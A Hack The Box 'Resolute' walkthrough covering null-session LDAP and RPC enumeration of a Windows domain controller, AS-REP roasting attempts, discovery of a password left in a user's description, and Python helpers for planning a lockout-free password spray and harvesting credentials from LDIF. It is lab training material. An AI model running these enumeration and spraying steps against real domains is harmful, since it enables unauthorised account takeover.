Nmap scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 08:42 EDT
Nmap scan report for 10.10.10.169
Host is up (0.30s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-15 12:50:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2023-09-15T12:51:18
|_ start_date: 2023-09-15T12:49:30
|_clock-skew: mean: 2h27m04s, deviation: 4h02m31s, median: 7m03s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2023-09-15T05:51:19-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.59 seconds
The clock-skew line is worth noting: Kerberos tolerates at most 5 minutes of skew, so if Kerberos-based tooling later fails with clock errors, sync the attacking box to the DC first (e.g. sudo ntpdate 10.10.10.169).
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec smb 10.10.10.169 -u "" -p ""
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
smbclient
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ smbclient -L //10.10.10.169
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Add the domain to the hosts file
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.161 htb.local
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.169 megabank.local
ldapsearch: anonymous bind is allowed, so we pull the naming contexts first and then the user list
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=megabank,DC=local
namingContexts: CN=Configuration,DC=megabank,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=megabank,DC=local
namingContexts: DC=DomainDnsZones,DC=megabank,DC=local
namingContexts: DC=ForestDnsZones,DC=megabank,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
Guest
DefaultAccount
RESOLUTE$
MS02$
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
Add the users to a text file called users.txt. Running them through kerbrute confirms that pretty much all of them are valid.
Next we check whether any account has Kerberos pre-authentication disabled (AS-REP roasting). GetNPUsers.py is run once per user from the list (it also accepts -usersfile to do the same in a single run):
while read -r user; do
./GetNPUsers.py megabank.LOCAL/$user -no-pass -dc-ip 10.10.10.169
done < /home/kali/HTB/resolute/users.txt
None of the users have UF_DONT_REQUIRE_PREAUTH set, so no AS-REP hashes come back. Guest and DefaultAccount answer with KDC_ERR_CLIENT_REVOKED, which is what the KDC returns for disabled accounts:
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for Guest
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for DefaultAccount
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for RESOLUTE$
[-] User RESOLUTE$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for MS02$
[-] User MS02$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for ryan
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for marko
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for sunita
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for abigail
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for marcus
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for sally
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for fred
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for angela
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for felicia
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for gustavo
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for ulf
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for stevie
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for claire
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for paulo
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for steve
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for annette
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for annika
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for per
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for claude
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for melanie
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for zach
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for simon
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for naoki
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
Tried rpcclient with an empty username; without -N it prompts for a password and the logon is rejected:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ rpcclient 10.10.10.169 -U ''
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Asking GetNPUsers.py to find the pre-auth-less accounts itself via LDAP (no user list) gives the same answer:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.169 -request 'megabank.local/'
Impacket v0.11.0 - Copyright 2023 Fortra
No entries found!
enum4linux
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ enum4linux -S 10.10.10.169
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Sep 15 09:12:26 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.169 )============================
[E] Can't find workgroup/domain
===================================( Session Check on 10.10.10.169 )===================================
[+] Server 10.10.10.169 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.169 )================================
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[+] Host is part of a domain (not a workgroup)
=================================( Share Enumeration on 10.10.10.169 )=================================
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.169
enum4linux complete on Fri Sep 15 09:12:46 2023
Back to SMB: crackmapexec confirms a null session is accepted (note the [+] with an empty user), but smbclient lists no shares with it:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ crackmapexec smb 10.10.10.169 -u '' -p ''
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ smbclient -L //10.10.10.169 -N -U%
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ smbclient -L //10.10.10.169 -N -U% --max-protocol=SMB2
Tried RID cycling against the domain SID (S-1-5-21-1392959593-3013219662-3596683436) with ridenum.py, but the SAMR lookups are denied:
└─$ ./ridenum.py 10.10.10.169 500 550
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information:
Domain Name: MEGABANK
Domain Sid: S-1-5-21-1392959593-3013219662-3596683436
[*] Moving on to extract via RID cycling attack..
[*] Enumerating user accounts.. This could take a little while.
[!] Server sent NT_STATUS_ACCESS DENIED, unable to extract users.
[*] Attempting enumdomusers to enumerate users...
[!] Sorry. RIDENUM failed to successfully enumerate users. Bummers.
Password policy. The important line is Account Lockout Threshold: None, which means a password spray across every user later on cannot lock anyone out; minimum length 7 and no complexity requirement also mean weak defaults are allowed:
└─$ crackmapexec smb 10.10.10.169 --pass-pol
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] Dumping password info for domain: MEGABANK
SMB 10.10.10.169 445 RESOLUTE Minimum password length: 7
SMB 10.10.10.169 445 RESOLUTE Password history length: 24
SMB 10.10.10.169 445 RESOLUTE Maximum password age: Not Set
SMB 10.10.10.169 445 RESOLUTE
SMB 10.10.10.169 445 RESOLUTE Password Complexity Flags: 000000
SMB 10.10.10.169 445 RESOLUTE Domain Refuse Password Change: 0
SMB 10.10.10.169 445 RESOLUTE Domain Password Store Cleartext: 0
SMB 10.10.10.169 445 RESOLUTE Domain Password Lockout Admins: 0
SMB 10.10.10.169 445 RESOLUTE Domain Password No Clear Change: 0
SMB 10.10.10.169 445 RESOLUTE Domain Password No Anon Change: 0
SMB 10.10.10.169 445 RESOLUTE Domain Password Complex: 0
SMB 10.10.10.169 445 RESOLUTE
SMB 10.10.10.169 445 RESOLUTE Minimum password age: 1 day 4 minutes
SMB 10.10.10.169 445 RESOLUTE Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.169 445 RESOLUTE Locked Account Duration: 30 minutes
SMB 10.10.10.169 445 RESOLUTE Account Lockout Threshold: None
SMB 10.10.10.169 445 RESOLUTE Forced Log off Time: Not Set
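Before spraying anything it is worth turning the policy above into numbers. The following Python is an added example (not part of the original notes): it parses crackmapexec's --pass-pol output (the sample is copied from the lines above, prefix columns included), works out how many guesses per user fit inside one lockout-reset window, and checks whether a candidate password even satisfies the length/complexity rules. The safety_margin default and the function names are my own choices.

```python
import re

# Sample input: copied from the crackmapexec --pass-pol output above (constructed subset).
POLICY_TEXT = """\
SMB 10.10.10.169 445 RESOLUTE [+] Dumping password info for domain: MEGABANK
SMB 10.10.10.169 445 RESOLUTE Minimum password length: 7
SMB 10.10.10.169 445 RESOLUTE Password history length: 24
SMB 10.10.10.169 445 RESOLUTE Maximum password age: Not Set
SMB 10.10.10.169 445 RESOLUTE
SMB 10.10.10.169 445 RESOLUTE Password Complexity Flags: 000000
SMB 10.10.10.169 445 RESOLUTE Domain Password Complex: 0
SMB 10.10.10.169 445 RESOLUTE Minimum password age: 1 day 4 minutes
SMB 10.10.10.169 445 RESOLUTE Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.169 445 RESOLUTE Locked Account Duration: 30 minutes
SMB 10.10.10.169 445 RESOLUTE Account Lockout Threshold: None
SMB 10.10.10.169 445 RESOLUTE Forced Log off Time: Not Set
"""

# crackmapexec prefixes every line with "SMB <ip> <port> <host>"; strip that if present.
PREFIX_RE = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s*")

def parse_policy(text):
    """Return {setting: raw value string} from --pass-pol output."""
    policy = {}
    for line in text.splitlines():
        line = PREFIX_RE.sub("", line.strip())
        key, sep, value = line.partition(":")
        if sep:
            policy[key.strip()] = value.strip()
    return policy

def _int_or_none(value):
    try:
        return int(value)
    except ValueError:          # "None", "Not Set"
        return None

def _minutes(value):
    """'1 day 4 minutes' -> 1444, '30 minutes' -> 30, 'Not Set' -> None."""
    total, found = 0, False
    for n, unit in re.findall(r"(\d+)\s*(day|hour|minute)", value):
        found = True
        total += int(n) * {"day": 1440, "hour": 60, "minute": 1}[unit]
    return total if found else None

def spray_plan(policy, safety_margin=1):
    """How many passwords per user can be tried inside one reset window without a lockout."""
    threshold = _int_or_none(policy.get("Account Lockout Threshold", "None"))
    reset = _minutes(policy.get("Reset Account Lockout Counter", "None"))
    if not threshold:           # None or 0: lockout disabled, spray freely
        return {"lockout": False, "attempts_per_window": None, "window_minutes": None}
    return {"lockout": True,
            "attempts_per_window": max(threshold - safety_margin, 1),
            "window_minutes": reset}

def password_fits_policy(policy, password):
    """Skip candidates the domain would never have accepted in the first place."""
    min_len = _int_or_none(policy.get("Minimum password length", "0")) or 0
    if len(password) < min_len:
        return False
    if policy.get("Domain Password Complex", "0") != "0":
        classes = sum(bool(re.search(p, password))
                      for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"))
        return classes >= 3     # Windows complexity: 3 of 4 character classes
    return True

if __name__ == "__main__":
    pol = parse_policy(POLICY_TEXT)
    print(spray_plan(pol))
    print("candidate ok:", password_fits_policy(pol, "Welcome123!"))
```

With a real threshold (say 5 attempts, 30-minute reset) the plan drops to 4 guesses per user per half hour; here it reports no lockout at all, which is what makes the later single-password spray safe.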
Looking for custom objects: dump everything over anonymous LDAP and count how often each attribute name appears - ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' -s sub | awk '{print $1}' | sort | uniq -c | sort -nr
This turned up a set of ipsec* attributes, but filtering on them gave nothing further:
┌──(kali㉿kali)-[~/Downloads]
└─$ ldapsearch -x -H ldap://10.10.10.169 -b 'DC=megabank,DC=local' -s sub '(objectClass=*)' sAMAccountName ipsecID ipsecDataType ipsecData ipsecOwnersReference ipsecName ipsecNFAReference ipsecNegotiationPolicyReference ipsecFilterReference | awk -F ': ' '
/^sAMAccountName:/ { username=$2 }
/^ipsecID:/ { ipsecid=$2 }
/^ipsecDataType:/ { ipsecdatatype=$2 }
/^ipsecData::/ { ipsecdata=$2 }
/^ipsecOwnersReference:/ { ipsecownersref=$2 }
/^ipsecName:/ { ipsecname=$2 }
/^ipsecNFAReference:/ { ipsecnfaref=$2 }
/^ipsecNegotiationPolicyReference:/ { ipsecnegpolref=$2 }
/^ipsecFilterReference:/ { ipsecfilterref=$2 }
# a blank line ends an LDIF entry: print what was collected for it, then reset
/^$/ && (username != "" || ipsecid != "") { print username ": " ipsecid ", " ipsecdatatype ", " ipsecdata ", " ipsecownersref ", " ipsecname ", " ipsecnfaref ", " ipsecnegpolref ", " ipsecfilterref; username=ipsecid=ipsecdatatype=ipsecdata=ipsecownersref=ipsecname=ipsecnfaref=ipsecnegpolref=ipsecfilterref="" }'
Every row came out with empty fields. The ipsec* attributes belong to the IPsec policy objects under CN=IP Security,CN=System, which carry no sAMAccountName, so there is nothing to join to a user and nothing of interest here.
rpcclient again, this time with -N so it does not prompt for a password; the null session is accepted:
┌──(kali㉿kali)-[~]
└─$ rpcclient -U '' -N 10.10.10.169
enumdomusers returns the list we already had from ldapsearch, plus Administrator and krbtgt, which the anonymous LDAP search did not return:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
Running querydispinfo shows each account's description field, and marko (Marko Novak) has a password in his:
rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
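The querydispinfo listing carries more than the description: the acb column is the SAMR account-control bitmask, which tells you which accounts are disabled before you waste spray attempts (and explains the KDC_ERR_CLIENT_REVOKED answers for Guest and DefaultAccount earlier). The following Python is an added example, not part of the original notes: it parses rows in the shape rpcclient prints (the sample is a constructed subset copied from the listing above), decodes the ACB_* bits, flags descriptions that look like they contain credentials, and returns only the enabled accounts as spray targets. The regex for "suspicious" words is my own choice.

```python
import re

# Constructed sample in the shape rpcclient's querydispinfo prints (rows taken
# from the listing above; only a handful, not the whole domain).
SAMPLE_DISPINFO = """\
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
"""

# SAMR account-control bits (MS-SAMR ACB_* values).
ACB_FLAGS = [
    (0x0001, "DISABLED"), (0x0002, "HOMDIRREQ"), (0x0004, "PWNOTREQ"),
    (0x0008, "TEMPDUP"),  (0x0010, "NORMAL"),    (0x0020, "MNS"),
    (0x0040, "DOMTRUST"), (0x0080, "WSTRUST"),   (0x0100, "SVRTRUST"),
    (0x0200, "PWNOEXP"),  (0x0400, "AUTOLOCK"),
]

ROW_RE = re.compile(
    r"index: (?P<index>0x[0-9a-f]+) RID: (?P<rid>0x[0-9a-f]+) acb: (?P<acb>0x[0-9a-f]+) "
    r"Account: (?P<account>\S+) Name: (?P<name>.*?) Desc: (?P<desc>.*)$"
)
# Words in a description that deserve a human look (my own list).
LEAK_RE = re.compile(r"pass(word|wd)?|pwd|cred|secret", re.IGNORECASE)

def decode_acb(acb):
    """0x215 -> ['DISABLED', 'PWNOTREQ', 'NORMAL', 'PWNOEXP']"""
    return [name for bit, name in ACB_FLAGS if acb & bit]

def parse_dispinfo(text):
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        acb = int(m["acb"], 16)
        rows.append({
            "rid": int(m["rid"], 16),
            "account": m["account"],
            "name": None if m["name"] == "(null)" else m["name"],
            "desc": None if m["desc"] == "(null)" else m["desc"],
            "flags": decode_acb(acb),
            "enabled": not acb & 0x0001,
            "pw_never_expires": bool(acb & 0x0200),
        })
    return rows

def leaky_descriptions(rows):
    """Accounts whose description text looks like it carries a credential."""
    return [r for r in rows if r["desc"] and LEAK_RE.search(r["desc"])]

def spray_targets(rows):
    """Enabled accounts only: disabled ones just answer KDC_ERR_CLIENT_REVOKED / LOGON_FAILURE."""
    return [r["account"] for r in rows if r["enabled"]]

if __name__ == "__main__":
    rows = parse_dispinfo(SAMPLE_DISPINFO)
    for r in rows:
        print(f'{r["account"]:<14} rid={r["rid"]:<5} {"/".join(r["flags"]):<32} {r["desc"] or ""}')
    print("leaky:", [r["account"] for r in leaky_descriptions(rows)])
    print("spray:", spray_targets(rows))
```

Feed it the full querydispinfo output and the spray list shrinks to accounts that can actually authenticate; Guest, DefaultAccount and krbtgt drop out on the DISABLED bit alone.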
The same can be pulled over anonymous LDAP by requesting sAMAccountName and description for every user object; marko's description again gives Welcome123!:
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ ldapsearch -x -H ldap://10.10.10.169 -b "DC=megabank,DC=local" -s sub "(objectClass=user)" sAMAccountName description
# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName description
#
# Guest, Users, megabank.local
dn: CN=Guest,CN=Users,DC=megabank,DC=local
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest
# DefaultAccount, Users, megabank.local
dn: CN=DefaultAccount,CN=Users,DC=megabank,DC=local
description: A user account managed by the system.
sAMAccountName: DefaultAccount
# RESOLUTE, Domain Controllers, megabank.local
dn: CN=RESOLUTE,OU=Domain Controllers,DC=megabank,DC=local
sAMAccountName: RESOLUTE$
# MS02, Computers, megabank.local
dn: CN=MS02,CN=Computers,DC=megabank,DC=local
sAMAccountName: MS02$
# Ryan Bertrand, Contractors, MegaBank Users, megabank.local
dn: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
sAMAccountName: ryan
# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to Welcome123!
sAMAccountName: marko
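Both awk pipelines above (the ipsec* one and this description search) share the same weakness: ldapsearch folds long values onto continuation lines and emits non-ASCII values as base64 (attr:: value), so a line-at-a-time grep or awk silently loses exactly the descriptions most likely to hold a pasted password. Here is an added Python LDIF reader that is not part of the original notes: it unfolds continuation lines, decodes :: values and groups attributes per entry before looking for credential-like descriptions. The first two sample entries are copied from the output above; the two marked constructed are made up here to exercise the folding and base64 cases, and the LEAK_RE word list is my own.

```python
import base64
import re

# Sample LDIF: the first two entries are copied from the ldapsearch output above; the
# two marked "constructed" are invented here to exercise line folding and base64.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName description
#

# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Account created. Password set to Welcome123!
sAMAccountName: marko

# Ryan Bertrand, Contractors, MegaBank Users, megabank.local
dn: CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
sAMAccountName: ryan

# constructed: a long description that ldapsearch folds at 76 columns
dn: CN=Example Wrapped,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description: Temporary contractor account, remember the initial password is Su
 mmer2023! and rotate it
sAMAccountName: wrapped

# constructed: a value with non-ASCII bytes is emitted base64-encoded (attr::)
dn: CN=Example Base64,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
description:: UGFzc3dvcmQ6IFrDvHJpY2gyMDIzIQ==
sAMAccountName: b64

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 4
"""

LEAK_RE = re.compile(r"pass(word|wd)?|pwd|cred|secret", re.IGNORECASE)

def unfold(text):
    """Yield logical LDIF lines: a physical line starting with a space continues the previous one."""
    buf = None
    for raw in text.splitlines():
        if raw.startswith(" ") and buf is not None:
            buf += raw[1:]
            continue
        if buf is not None:
            yield buf
        buf = raw
    if buf is not None:
        yield buf

def parse_ldif(text):
    """Return one {attribute: [values]} dict per entry (entries are blank-line separated)."""
    entries, current = [], {}
    for line in unfold(text):
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
            current = {}
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):                      # attr:: base64 value
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return [e for e in entries if "dn" in e]        # drop the trailing search:/result: block

def account_descriptions(entries):
    """(sAMAccountName, description or None) for every entry that has an account name."""
    return [(e["sAMAccountName"][0], e.get("description", [None])[0])
            for e in entries if "sAMAccountName" in e]

def leaky(entries):
    return [(sam, desc) for sam, desc in account_descriptions(entries)
            if desc and LEAK_RE.search(desc)]
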